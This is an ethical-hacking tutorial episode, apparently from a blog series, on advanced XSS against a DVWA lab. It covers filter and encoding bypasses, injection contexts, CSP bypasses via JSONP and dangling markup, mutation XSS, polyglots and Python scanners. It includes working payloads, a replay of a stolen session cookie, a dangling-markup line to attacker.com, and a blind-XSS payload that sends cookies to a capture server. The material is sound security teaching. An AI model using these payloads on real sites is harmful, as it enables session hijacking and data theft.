Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP


What will I learn

  • Filter bypass techniques: encoding, tag alternatives, event handlers;
  • CSP bypass: dangling markup, script gadgets, JSONP endpoints;
  • XSS polyglots: single payloads that work in multiple injection contexts;
  • Mutation XSS (mXSS): exploiting browser HTML parser differences;
  • Using Burp Suite and XSS Hunter for advanced XSS discovery;
  • Testing XSS on DVWA at Medium and High security levels.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2 (Kali + DVWA);
  • Burp Suite Community Edition;
  • Knowledge from Episode 14 (XSS fundamentals);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 14 Exercises

Exercise 1 -- Full XSS session hijacking chain:

1. Reflected XSS on DVWA: injected <script>alert(document.cookie)</script>
   in the name parameter -- alert showed PHPSESSID and security level.

2. Stored XSS in guestbook: injected cookie-stealing Image() payload.
   Every visitor to the guestbook page triggers the cookie exfiltration.

3. Session hijacking: captured victim's PHPSESSID from cookie catcher,
   then used curl with that cookie to access DVWA:
   curl -b "PHPSESSID=stolen_value; security=low" http://target/dvwa/
   -> Logged in as victim. Full account access without credentials.

The complete chain: XSS -> cookie theft -> session hijacking takes
under 60 seconds from injection to account takeover.

The key insight: XSS is not just "popup alerts" -- it's a direct path to account takeover. The cookie IS the identity. Steal the cookie, become the user.

Exercise 2 -- XSS scanner:

import sys
import requests
from urllib.parse import urlparse, parse_qs, urlencode

PAYLOADS = [
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
    "'onmouseover='alert(1)",
    '<svg onload=alert(1)>',
    'javascript:alert(1)',
]

def scan_xss(url, cookies=None):
    """Inject each payload into every query parameter, flag unencoded reflections."""
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    for param in params:
        for payload in PAYLOADS:
            test_params = dict(params)
            test_params[param] = [payload]
            test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{urlencode(test_params, doseq=True)}"
            resp = requests.get(test_url, cookies=cookies, timeout=10)
            if payload in resp.text:  # reflected verbatim -> output is not encoded
                print(f"[+] XSS in '{param}': {payload}")

if __name__ == "__main__":
    scan_xss(sys.argv[1])

The key insight: checking if the payload appears unencoded in the response is the simplest XSS detection method. If <script> goes in and <script> comes back (not &lt;script&gt;), the application isn't encoding output.
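That check can be made explicit with a small helper (hypothetical, not part of the exercise scanner) that distinguishes the three possible outcomes using Python's html module:

```python
from html import escape

def reflection_status(payload, response_text):
    """Classify how a test payload came back in the response."""
    if payload in response_text:
        return "unencoded"      # raw reflection -- likely XSS
    if escape(payload) in response_text:
        return "encoded"        # output encoding is in place
    return "not reflected"

print(reflection_status('<script>', 'hello <script> world'))        # unencoded
print(reflection_status('<script>', 'hello &lt;script&gt; world'))  # encoded
print(reflection_status('<script>', 'nothing relevant here'))       # not reflected
```

Only the "unencoded" case is worth following up with real payloads; the "encoded" case tells you the application is doing the right thing for that parameter.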

Exercise 3 -- textContent vs innerHTML:

textContent treats ALL input as plain text. When you write
"<script>alert(1)</script>" to textContent, it displays
literally as the string "<script>alert(1)</script>" on the page.
The browser never parses it as HTML.

innerHTML treats input as HTML markup. The browser's HTML parser
processes it, creating actual DOM elements -- including script tags
that execute JavaScript. This is the fundamental difference: text
vs structured markup. For user input, always use textContent unless
you specifically need HTML rendering (and if you do, sanitize first
with a library like DOMPurify).

Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP

Last episode you injected <script>alert(1)</script> into DVWA at security level Low and it worked immediately. The tag went in, the browser executed it, cookies were stolen. Beautiful. But real applications aren't that accommodating. They have input filters, WAFs, Content Security Policies, framework-level sanitization, and (sometimes) developers who actually read the OWASP cheat sheets.

Today we learn to get past all of them.

This is where XSS stops being a "beginner vulnerability" and starts being the kind of thing that wins $20,000 bug bounties on Google and Facebook. The fundamentals from episode 14 are your foundation -- now we build the house. Set your DVWA security to Medium, and let's see what breaks.

Here we go.

DVWA Medium: Your First Filter

At Medium security, DVWA's reflected XSS page filters out the <script> tag. Try the classic:

<script>alert(1)</script>

Nothing happens. The tag gets stripped. The developer thought "I'll just remove <script> and the problem goes away." And for exactly that one payload, they're right. But there are hundreds of ways to execute JavaScript in HTML beyond <script>. HTML has over 50 elements that accept event handler attributes, and every single one of them can run JavaScript:

<!-- Event handler on an image that fails to load -->
<img src=x onerror=alert(1)>

<!-- SVG with onload event -->
<svg onload=alert(1)>

<!-- Body tag with onload -->
<body onload=alert(1)>

<!-- Input with autofocus and onfocus -->
<input autofocus onfocus=alert(1)>

<!-- Details element with open attribute -->
<details open ontoggle=alert(1)>

<!-- Marquee (yes, it still works in most browsers) -->
<marquee onstart=alert(1)>

Try <img src=x onerror=alert(1)> on DVWA Medium. It works. The filter catches <script> but doesn't know about the onerror event handler on an <img> tag. Or onload on <svg>. Or onfocus on <input>. The developer played whack-a-mole with one tag and left 50+ others wide open.

Having said that, this isn't unusual. I've seen production applications that had extensive <script> filtering but let <img onerror> through without blinking. The blocklist approach to XSS prevention is fundamentally flawed because you're trying to enumerate everything dangerous, and the list of dangerous things in HTML is enormous and keeps growing with new browser features ;-)
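To see why the whack-a-mole approach fails, here is a hypothetical Medium-style filter sketched in Python: it strips <script> blocks but waves event-handler payloads straight through.

```python
import re

def naive_filter(user_input):
    # Blocklist approach: strip <script>...</script>, case-insensitively.
    # This is a sketch of the flawed pattern, not DVWA's actual code.
    return re.sub(r'<script.*?>.*?</script>', '', user_input,
                  flags=re.IGNORECASE | re.DOTALL)

print(naive_filter('<script>alert(1)</script>'))     # '' -- blocked
print(naive_filter('<ScRiPt>alert(1)</ScRiPt>'))     # '' -- blocked
print(naive_filter('<img src=x onerror=alert(1)>'))  # passes untouched
```

The filter looks effective against the payload the developer tested with, and does nothing at all against the other 50+ vectors.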

DVWA High: Stricter Filtering

At High security, DVWA uses a regex to strip ANY <script> tag, including case variations like <ScRiPt> and <SCRIPT>. View the source code (click "View Source" on the DVWA page) -- you'll see something like preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name). That regex catches every possible spelling of "script" by matching individual characters with wildcards between them.

But it ONLY blocks <script> variations. Everything else still works:

<!-- Still works at High security: -->
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>

The lesson: blocklist-based filtering always fails. There are too many vectors, too many encoding tricks, too many browser quirks. You can build a blocklist with 200 entries and the attacker finds vector #201. The only correct approaches are allowlisting (permit only known-safe content) or output encoding (convert ALL special characters to HTML entities before rendering). We covered output encoding in episode 14 -- it's the architectural fix, same way parameterized queries are the architectural fix for SQL injection (episode 12). Band-aids vs cures.
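As a quick sketch of what output encoding does, Python's html.escape converts every HTML-special character to an entity, so even an aggressive payload renders as inert text:

```python
from html import escape

# An attribute-breakout payload from the examples above
user_input = '"><img src=x onerror=alert(1)>'

# Encode ALL special characters before rendering -- the architectural fix
safe = escape(user_input, quote=True)
print(safe)  # &quot;&gt;&lt;img src=x onerror=alert(1)&gt;
```

No enumeration of dangerous tags, no regex arms race: every < > " ' & becomes an entity, and the browser displays the payload instead of executing it.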

Encoding Bypasses

When filters check for literal strings like alert or <script>, encoding can slip right past them. The trick is that the browser decodes certain encodings after the server-side filter has already checked the input:

<!-- HTML entity encoding -- browser decodes entities in attributes -->
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

<!-- Mixed case (filters checking lowercase "script") -->
<ScRiPt>alert(1)</ScRiPt>

<!-- Null bytes (some filters split on null) -->
<scr%00ipt>alert(1)</scr%00ipt>

<!-- Double encoding (if the app decodes twice) -->
%253Cscript%253Ealert(1)%253C/script%253E

<!-- JavaScript unicode escapes in event handlers -->
<img src=x onerror=\u0061lert(1)>

<!-- Backtick instead of parentheses (filters blocking "(") -->
<img src=x onerror=alert`1`>

The HTML entity bypass (&#97;&#108;&#101;&#114;&#116;) is particularly effective. The server-side filter sees &#97;&#108;&#101;... -- which doesn't match the string alert. But when the browser parses the HTML, it decodes the entities to alert and executes it. The filter checked the wire format; the browser interprets the decoded format. Two different parsers, two different views of the same data -- and that gap is exploitable.
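The two views are easy to reproduce with Python's html module -- the filter checks the entity-encoded wire format, while the browser works with the decoded form (browsers decode entities inside attribute values, which is exactly where this payload puts them):

```python
from html import unescape

wire = '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>'

print('alert' in wire)            # False -- the filter's view: no "alert" substring
print('alert' in unescape(wire))  # True  -- the browser's view after entity decoding
print(unescape(wire))             # <img src=x onerror=alert(1)>
```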

Double encoding works when an application URL-decodes the input, then passes it through a filter, then URL-decodes it again (or passes it to another layer that decodes). %253C decodes to %3C in the first pass (still looks harmless), then %3C decodes to < in the second pass. If the filter runs between the two decode steps, it never sees the < character. This is why defense-in-depth matters: decode once, validate once, encode at output. Anything more complex creates opportunities for parser differential attacks.
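The same gap can be reproduced with urllib: each unquote pass peels one layer of URL encoding, and a filter that runs between the two passes never sees the dangerous characters.

```python
from urllib.parse import unquote

wire = '%253Cscript%253Ealert(1)%253C/script%253E'

first = unquote(wire)    # decode pass 1 -- what the filter inspects
second = unquote(first)  # decode pass 2 -- what the vulnerable layer renders

print(first)   # %3Cscript%3Ealert(1)%3C/script%3E  (still looks harmless)
print(second)  # <script>alert(1)</script>
```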

XSS in Different Injection Contexts

The bypass technique depends entirely on WHERE your input lands in the HTML. This is the context problem we introduced in episode 14 -- now we go deeper:

Inside an HTML tag attribute:

<!-- Application generates: <input value="USER_INPUT"> -->
<!-- Break out of the attribute: -->
" onmouseover="alert(1)" x="
<!-- Result: <input value="" onmouseover="alert(1)" x=""> -->

Inside a JavaScript string:

<!-- Application generates: var name = "USER_INPUT"; -->
<!-- Break out of the string: -->
"; alert(1); var x="
<!-- Result: var name = ""; alert(1); var x=""; -->

<!-- Or close the script tag entirely: -->
</script><script>alert(1)</script>

That second one -- closing the </script> tag -- is worth dwelling on. The HTML parser operates at a HIGHER priority than the JavaScript parser. When the HTML parser sees </script>, it closes the script block regardless of what the JavaScript parser thinks is happening. You could be inside a JavaScript string, a comment, a template literal -- doesn't matter. The HTML parser wins. This is a fundamental parser hierarchy issue that trips up even experienced developers who think "but the input is inside a JavaScript string, so HTML tags shouldn't matter." They do. The HTML parser sees </script> first and ends the script block, then the next <script> starts a new one.
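You can watch this parser hierarchy in action with Python's html.parser, which follows the same tokenizer rule: script content is raw text only until the first closing tag, even if the JavaScript parser would consider you mid-string at that point.

```python
from html.parser import HTMLParser

class Events(HTMLParser):
    """Record start tags, end tags, and text in parse order."""
    def __init__(self):
        super().__init__()
        self.events = []
    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag))
    def handle_endtag(self, tag):
        self.events.append(("end", tag))
    def handle_data(self, data):
        self.events.append(("data", data))

p = Events()
p.feed('<script>var name = "</script><script>alert(1)</script>";')

# The first </script> ends the script block even though the JavaScript
# parser would consider us inside a string literal:
print(p.events[:3])  # [('start', 'script'), ('data', 'var name = "'), ('end', 'script')]
print(("data", "alert(1)") in p.events)  # True -- attacker code in a fresh script block
```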

Inside a JavaScript template literal:

Application generates: var msg = `Hello USER_INPUT`;
Payload: ${alert(1)}
Template literals evaluate expressions inside ${}

Inside an HTML comment:

Application generates: <!-- USER_INPUT -->
Payload: --><script>alert(1)</script>
The --> closes the comment early, so everything after it parses as live HTML.

Understanding injection context is the single most important skill for advanced XSS. A payload that works in one context is dead text in another. This is also why automated scanners test dozens of payloads per parameter -- they're covering multiple possible contexts because they can't always determine context from the outside.

Content Security Policy Bypass

CSP is the strongest browser-side defense against XSS. When properly deployed, it blocks inline scripts, inline event handlers, javascript: URLs, and eval(). A perfect CSP makes XSS exploitation extremely difficult even when the vulnerability exists.

But CSP is rarely deployed perfectly. Here's what goes wrong:

CSP with 'unsafe-inline':

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

The unsafe-inline keyword defeats the entire purpose of CSP for XSS prevention. Inline scripts execute. Inline event handlers fire. Many applications add this because their own code uses inline scripts scattered throughout the HTML, and refactoring all of those to external .js files feels like too much work. So they deploy CSP with the one keyword that makes it useless against XSS. Brilliant.

CSP with JSONP endpoints:

If script-src includes a domain that has JSONP endpoints, you can use those endpoints to execute arbitrary code from an "allowed" origin:

<!-- CSP allows scripts from allowed-cdn.com -->
<!-- That CDN has a JSONP endpoint: -->
<script src="https://allowed-cdn.com/api?callback=alert(1)//"></script>

The JSONP endpoint returns alert(1)//({...}) -- your code, from an allowed domain. The // comments out the rest so it doesn't cause a syntax error. CSP sees a script loaded from a whitelisted domain and allows it. Google's CSP Evaluator tool (csp-evaluator.withgoogle.com) specifically checks for known JSONP endpoints on whitelisted domains -- it's that common a bypass.
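A JSONP endpoint is essentially a server that reflects the callback parameter into executable JavaScript. A toy sketch of the server-side logic (hypothetical, not any real CDN's code) makes the problem obvious:

```python
def jsonp_response(callback, data='{"user": "demo"}'):
    # The server wraps its JSON in whatever function name the caller requested
    return f"{callback}({data})"

print(jsonp_response("handleData"))  # handleData({"user": "demo"})
print(jsonp_response("alert(1)//"))  # alert(1)//({"user": "demo"})
```

Unless the server strictly validates the callback name (letters, digits, dots only), the "callback" is arbitrary JavaScript served from an origin the CSP trusts.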

CSP with 'unsafe-eval':

Content-Security-Policy: script-src 'self' 'unsafe-eval'

unsafe-eval allows eval(), setTimeout('code'), new Function('code'), and similar dynamic code execution. If you can inject a string that reaches any of these functions, you bypass CSP entirely. Some frameworks (particularly older Angular.js versions) require unsafe-eval to function, which means any application using those frameworks with CSP has this hole.

Dangling markup injection:

When you can inject HTML but CSP blocks all script execution, you can still exfiltrate data using dangling markup:

<img src="https://attacker.com/collect?data=

Notice the missing closing quote. The browser keeps reading the HTML source looking for that closing quote, and everything it finds becomes part of the src URL -- until it hits a matching " somewhere later in the page. If the page contains secrets (CSRF tokens, user data, API keys in hidden fields), they get included in the image request URL sent to the attacker. No JavaScript required. No CSP violation. Just HTML doing what HTML does when you leave an attribute open.

This is devious because it doesn't trigger any CSP violation reports. It's a pure HTML-level attack. The browser makes a legitimate image request to load what it thinks is an image -- the exfiltrated data rides along as a query parameter.

Mutation XSS (mXSS): When the Browser Rewrites Your Code

Mutation XSS exploits the fact that browsers don't just passively parse HTML -- they actively mutate it. The browser's HTML parser "fixes" invalid markup according to the HTML specification, and these fixes can transform safe-looking input into dangerous output.

Here's how it works: an application sanitizes user input by parsing it, checking for dangerous elements, and producing a clean DOM tree. Safe so far. But when that DOM tree gets serialized back to HTML (via innerHTML), the browser may restructure the markup in ways the sanitizer didn't predict. The sanitized version looked safe. The mutated version is dangerous.

A classic mXSS example:

<!-- Input that passes sanitization: -->
<svg><p><style><img src=x onerror=alert(1)>

<!-- The sanitizer sees: an SVG containing a paragraph containing
     a style block containing what looks like CSS text (the img tag
     is treated as text inside style). Looks safe. -->

<!-- But the browser's parser treats SVG and HTML differently.
     When switching from SVG context to HTML context, the parser
     re-interprets the content. The <img> breaks out of the style
     context and becomes a real HTML element with an executable
     event handler. -->

The mutation happens because HTML parsing rules are context-dependent. Inside SVG, certain elements are treated as foreign content. When the parser switches back to HTML mode (which happens at the <p> tag -- <p> is not valid SVG), the parsing rules change. What was treated as inert text in one context becomes executable markup in another.

DOMPurify (the most widely used HTML sanitizer) has had multiple mXSS bypasses over the years. Each one gets patched, and then researchers find new mutation vectors. It's an arms race between the sanitizer's model of the parser and the actual parser behavior across different browsers. Chrome, Firefox, and Safari can all produce different mutations from the same input because their parser implementations differ in edge cases. If the sanitizer tests against one browser's behavior but the victim uses a different browser, the mutation bypass might only work in the victim's browser.

This is advanced stuff. mXSS research requires deep understanding of the HTML5 parsing specification (a 600+ page document full of state machines and special cases). But even knowing that mXSS exists is important -- it means that even applications using DOMPurify or similar sanitizers can have XSS vulnerabilities, because the sanitizer's model of HTML parsing is inherently an approximation.

XSS Polyglots

A polyglot is a single payload designed to execute in multiple injection contexts simultaneously. Instead of crafting context-specific payloads, you throw one string at the target and it attempts to trigger XSS regardless of whether it lands in an HTML body, a tag attribute, a JavaScript string, or a URL context:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//

This payload attempts break-out sequences for almost every context at once. It's ugly, it's clever, and it's the security researcher's Swiss army knife for initial testing when you don't know where your input ends up. If it pops an alert, you know XSS exists. Then you can craft a clean, context-specific payload for actual exploitation.

A simpler polyglot that covers the most common cases:

'"><img src=x onerror=alert(1)>

The '" breaks out of both single and double-quoted attribute values. The > closes any open tag. The <img> with onerror executes JavaScript without needing <script>. Simple, effective, works in most reflected injection scenarios. This is typically the first thing I test on any input field -- if this comes back in the response unencoded, you've almost certainly got reflected XSS ;-)

Advanced XSS Discovery with Burp Suite

In episode 11 we used Burp Suite as an HTTP proxy to intercept and modify requests. For XSS hunting, Burp's Intruder feature automates payload injection across parameters:

  1. Capture a request to the vulnerable page in Burp's Proxy
  2. Send it to Intruder (right-click -> "Send to Intruder")
  3. Mark the injection point (the parameter value you want to fuzz)
  4. Load an XSS payload list (Burp includes several, or use one from PayloadsAllTheThings on GitHub)
  5. Start the attack -- Intruder sends one request per payload
  6. Sort results by response length or search for your payloads in responses

The free Burp Suite Community Edition limits Intruder speed (throttled requests), but it's enough for lab work. For DVWA:

Target: http://192.168.56.101/dvwa/vulnerabilities/xss_r/
Parameter: name
Payload list: XSS basic payloads (50-100 common vectors)
Grep match: "alert" (to flag responses containing unencoded payloads)

Burp also has a Scanner (Pro edition only) that automatically crawls applications and tests for XSS and other vulnerabilities. The scanner uses a technique called "in-band detection" -- it injects unique canary strings, checks if they appear in the response, then follows up with actual XSS payloads only for parameters that reflect input. This two-phase approach is much more efficient than blindly throwing payloads at every parameter.

XSS Hunter (xsshunter.trufflesecurity.com) is a specialized tool for detecting blind XSS -- cases where your payload executes in a context you can't directly see, like an admin panel, a logging dashboard, or an internal report viewer. You inject an XSS Hunter payload (a JavaScript snippet that phones home to the XSS Hunter service), and if it ever executes anywhere, you get an alert with a screenshot of the page, the DOM content, cookies, and the URL where it fired.

Blind XSS is more common than you'd think. Submit a support ticket with a payload in the description. If the support agent's internal dashboard renders the ticket HTML unsafely, your payload fires in THEIR browser, inside the admin panel. Same with error logs (application logs your malicious input, admin views the logs in a web-based log viewer that doesn't encode output), feedback forms, user profile fields viewed by moderators, invoice comments viewed by accounting teams. Anywhere your input travels through the system and gets rendered later by someone else.
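A minimal capture endpoint for blind-XSS callbacks can be sketched with Python's standard library (names and port are illustrative, not from a real tool -- run it on your attack box and point your payload's exfiltration URL at it):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Everything the payload sends rides in the path and query string
        print(f"[+] Callback from {self.client_address[0]}: {self.path}")
        for name, value in self.headers.items():
            print(f"    {name}: {value}")
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # silence the default access log; we print our own

def run(host="0.0.0.0", port=8000):
    HTTPServer((host, port), CaptureHandler).serve_forever()
```

Call run() and inject something like <img src=x onerror="new Image().src='http://YOUR_IP:8000/c?d='+document.cookie"> into a support ticket or profile field. If the callback ever arrives -- minutes or days later -- you know exactly which internal page rendered your input unsafely.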

Automated XSS Discovery with Python

Building on the scanner from Episode 14, here's a more comprehensive approach that detects injection context before selecting payloads:

#!/usr/bin/env python3
"""
Advanced XSS payload tester with context detection.
Tests reflected XSS across multiple injection contexts.
"""
import sys
import requests
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

PAYLOADS_BY_CONTEXT = {
    'html_body': [
        '<script>alert(1)</script>',
        '<img src=x onerror=alert(1)>',
        '<svg onload=alert(1)>',
        '<details open ontoggle=alert(1)>',
    ],
    'html_attribute': [
        '" onmouseover="alert(1)" x="',
        "' onfocus='alert(1)' autofocus='",
        '" autofocus onfocus="alert(1)',
    ],
    'javascript_string': [
        '";alert(1);//',
        "';alert(1);//",
        '</script><script>alert(1)</script>',
    ],
}

def set_param(url, param, value):
    """Return the URL with the given query parameter set to value."""
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    params[param] = [value]
    return urlunparse(parsed._replace(query=urlencode(params, doseq=True)))

def detect_context(response_text, marker):
    """Detect where in the HTML our input was reflected (crude string matching)."""
    contexts = []
    if f'value="{marker}"' in response_text or f"value='{marker}'" in response_text:
        contexts.append('html_attribute')
    if 'var ' in response_text and marker in response_text:
        contexts.append('javascript_string')
    if marker in response_text:
        contexts.append('html_body')
    return contexts

def test_url(url, param, cookies=None):
    """Test a parameter for XSS across detected contexts."""
    marker = "XSS_TEST_7x7x7"
    resp = requests.get(set_param(url, param, marker), cookies=cookies, timeout=10)

    if marker not in resp.text:
        print(f"[-] Input not reflected for '{param}'")
        return

    contexts = detect_context(resp.text, marker)
    print(f"[*] Input reflected in contexts: {contexts}")

    for ctx in contexts:
        for payload in PAYLOADS_BY_CONTEXT.get(ctx, []):
            test_resp = requests.get(set_param(url, param, payload),
                                     cookies=cookies, timeout=10)
            if payload in test_resp.text:  # reflected verbatim -> exploitable
                print(f"  [+] XSS ({ctx}): {payload[:60]}")

if __name__ == "__main__":
    test_url(sys.argv[1], sys.argv[2])

The context detection is crude (string matching) but effective as a first pass. A real scanner like Burp Suite uses more sophisticated heuristics -- parsing the full HTML, checking whether the reflection is inside a tag attribute, a script block, or raw HTML body content. But even this simple approach catches the majority of reflected XSS in practice.

The Real-World Impact

Bug bounty programs consistently pay the most for stored XSS (affects all users) and XSS that bypasses CSP. Google's Vulnerability Reward Program has paid millions for XSS findings. Facebook's bug bounty regularly awards $5,000-$20,000 for stored XSS.

Why so much for "just" XSS? Because on platforms with millions of users, a single stored XSS vulnerability can be weaponized to steal sessions, spread self-propagating worms, or deface content at scale. The Samy Worm (MySpace, 2005) infected 1 million profiles in 20 hours using a single stored XSS vulnerability. Samy Kamkar found that MySpace's XSS filters blocked <script> but allowed <div> with a style attribute containing an expression() -- a CSS expression that executed JavaScript in Internet Explorer. His worm added "Samy is my hero" to every infected profile and sent a friend request to Samy from each victim. It bypassed MySpace's word filters by splitting blocked keywords across CSS properties and using JavaScript string concatenation to reconstruct them. One vulnerability, one million victims, 20 hours. Unbelievable.

Could it happen again on modern platforms? The exact same technique wouldn't work -- CSS expressions are long dead, and modern frameworks auto-escape output by default. But the principle hasn't changed. In 2014, a stored XSS worm spread through TweetDeck (a Twitter client). In 2021, researchers demonstrated self-propagating XSS in Zoom's web client. The attack surface has shifted from simple HTML injection to framework-specific bypass techniques, but the fundamental category of vulnerability persists. Every time a developer writes dangerouslySetInnerHTML in React, they're re-opening the same door MySpace left open in 2005.

And this ties back to what we covered in episode 6 -- AI code assistants generate innerHTML and dangerouslySetInnerHTML with disturbing regularity because those are the "simple" solutions that appear most often in training data. The AI-generated code works perfectly in development. It just also executes attacker-controlled input in production.

The Full Picture: XSS Attack Chain

At this point in the series, you understand the complete XSS attack methodology. Let me lay it out as a structured approach:

  1. Identify reflection points -- find where your input appears in the response (Burp Repeater, manual testing, or the Python scanner)
  2. Determine injection context -- HTML body, attribute, JavaScript string, template literal, URL, CSS?
  3. Test basic payloads -- start with the polyglot, then use context-specific payloads
  4. Bypass filters -- encoding tricks, tag alternatives, null bytes, double encoding
  5. Bypass CSP -- check for unsafe-inline, JSONP endpoints, unsafe-eval, or use dangling markup
  6. Craft the exploit -- session hijacking, keylogging, phishing form injection, or worm propagation
  7. Deploy and capture -- set up your capture server, deliver the payload, collect the data

This is the same methodology professional pentesters use. The difference between a script kiddie running <script>alert(1)</script> and a skilled security researcher is steps 2 through 6 -- understanding context, bypassing defenses, and crafting payloads that work in the real world where things are never as simple as DVWA at Low security.

We're going to keep building on these web exploitation fundamentals as the series continues. There are entire categories of attacks that interact with XSS in interesting ways -- attacks where the victim's browser performs actions on their behalf without them knowing, server-side vulnerabilities that chain with client-side bugs, and authentication weaknesses that XSS makes trivially exploitable. The web attack surface goes deep.

Exercises

Exercise 1: Test DVWA's reflected XSS at ALL security levels (Low, Medium, High). Find a working payload for EACH level. Document: what filter was added at each level, what payload bypassed it, and WHY the bypass works. Then look at DVWA's source code (click "View Source" on each level) and identify the exact filtering code. Save your analysis in ~/lab-notes/dvwa-xss-levels.md.

Exercise 2: Build an XSS payload delivery and capture system: (a) a Python HTTP server that logs every request with full headers and query parameters, (b) an XSS payload that captures the victim's cookies, current URL, and browser user-agent, sending all three to your capture server in a single request. Test the full chain on DVWA (Low security). How much information can you exfiltrate from a single XSS injection? Save the capture server as ~/pentest-tools/xss_capture.py.

Exercise 3: Research the Samy Worm (MySpace XSS worm, 2005). Document: (a) the exact XSS vulnerability it exploited (CSS expression() in IE), (b) how it bypassed MySpace's filters (keyword splitting, string concatenation), (c) how it propagated (what did the worm's JavaScript do to each victim's profile?), (d) the scale of impact (1 million profiles in 20 hours), (e) what modern defense would have prevented it (CSP alone would have killed it). Write your findings in ~/lab-notes/samy-worm-analysis.md.


Filters are walls. Hackers are water. Water always finds a way.

@scipio


